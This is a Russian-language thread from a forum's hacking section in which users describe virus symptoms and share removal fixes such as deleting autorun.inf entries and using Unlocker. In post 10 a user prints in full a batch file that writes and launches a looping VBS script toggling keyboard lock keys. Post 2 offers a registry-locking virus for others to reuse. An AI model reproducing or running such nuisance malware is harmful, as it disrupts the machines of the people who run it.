terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » Вирусы - обсуждение


Вирусы - обсуждение

Сообщений 1 страница 13 из 13

1

тут можно выкладывать проблемы сосвоими машинами...
если вы думаете что у вас вирус
розкажите "симптомы" компьютера
вам подскажут как с этим боротся)

0

2

Всё поблоченно, от редактора реестра дор деспечера, вирус грохнул(кому надо могу прислать его версию, чтоб сами пользовались), в нём кстати работает битая ссылка, думаю может поменять на нашу???

Как думаете????

Но комп надо разблочить, я так понимаю что придётся писать батник на это дело, если разблочит реестр, то остальное дело техники   :(

0

3

а командная строка работает?

0

4

Нет не работает. всё для редактирования и настройки не работает.....

У меня вапрос такой, я когдата делал резервную копию реестра, если её загнать чтоб она востановила данные?

Либо пробывать постаронние программы для этого....    :(

0

5

GRAF_INCOGNET
создай нового пользователя, конечно предворительно очисть машину от вирусов.

0

6

а у меня один раз пропали проги: cmd, calc все мои сохранения и файли с расширением mp3,wav,ogg,avi,mp4,mpeg4 шо это за вирус такой а?

0

7

У меня фигня какая-то.
При сканировании машины на наличие всякой нечисти постоянно находятся 3! трояна Downloader.J14 как-то так они называются.
все они находятся в 1 файле. C:/windows/temp/startdrv.exe
они каждый раз лечатся антивирем(он об этом сообщает)))))но не исчезают. При попытке удалить файл вручную выдается предупреждение от системы.
че с этим делать?
ЗЫ форматировать нехочецо..(

0

8

А у меня был вирус, антивирь его удалил и теперь когда открываешь диск D двойным щелчком, пишет сто не найден copy.exe, мож мне кто даст этот файлик и заодно напишет путь куда надо его кидануть, а может подскажет какой-нить другой путь решения проблемы кроме format c:

0

9

Всем спасибо кто пытался мне помочь, но я помог себе сам)))
Покопался в google и нашел очень много интересного про тот самый copy.exe.
Короче для решения проблемы необходимо:

1. Удалить из корня диска, который не открывается, файл avtoran. inf
2. Запустить поиск в реестре и удалить там copy.exe
3. Перезагрузить комп

P.S. может эта инфа будет кому-нить полезна

0

10

У меня была проблема с к лавиатурой получилось следующая история на клавиатуре все буквы и цифры поменялись не возможно было ничего напечатать как оказалось
позже это был вирус который я хотел проверить вот его код это батник
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
После запуска этого баника у меня начала сначала индикация на клаве мигать быстро а после перезагрузки поменялась вся раскладка то есть я хочу напечатать л а набиралась цифра 7 переустановив дрова на клаве ничего не изменилось, выход нашел следующий просто создал нового пользователя и наделил его правами админа и все.

0

11

гы, мне всегда везет, с покупкой компа неодного антивируса ниставил

0

12

У меня на серваке не стоит ниадного антивируса, правда в клубе стоит анитивир, а проблем практически нету.

0

13

Очень часто пригождается прога,которая помогает разблочить файлы, экзешники и прочую фигню,занятую какими-либо процессами - Unlocker.Рекомендую.Вкупе с ПроцЭксплорер и РегКлинер мона грохнуть большинство вирусов.По-поводу доступа в реестр ответ один - удаляйте эти автораны (и exe и ссылки на них  в реестре) нафиг,ребут,как выше было сказано, и дело в шляпе.

0


Вы здесь » terminal-s52 » Хакинг » Вирусы - обсуждение